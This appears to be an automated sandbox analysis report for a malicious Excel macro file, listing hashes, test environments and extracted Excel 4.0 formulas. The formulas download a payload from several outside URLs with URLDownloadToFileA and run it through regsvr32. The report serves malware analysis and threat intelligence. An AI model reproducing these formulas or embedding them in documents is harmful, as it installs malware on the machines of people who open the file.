Behavioral task: behavioral1
Sample: b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm
Resource: win10v2004-20241007-en
General
Target: b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309
Size: 49KB
MD5: f020f228e8ab39be16537b62d4dbc173
SHA1: 477c146ef8dbd20a3974928d5f9135a847fd09fd
SHA256: b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309
SHA512: 83021a786a4c818078f9c259159c043b9cac6f3cb1287c06e5e641e2984b3d8f135e354644b1557adc000096184d27ce78bc874b45f675e98be920fbe1c9e151
SSDEEP: 768:SYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:SYu2xXncDSmSIBlGeuSEcm2h0B5lqB
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0)
=IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0))
=IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0))
=IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0))
=IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0))
=IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0))
=IF('LGGDGB'!E21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx")
=RETURN()
Signatures
Files
b2038bc4c07d7b6ea99e300793bcb632cdb837116e73d7367f2bff5c927a4309.xlsm office2007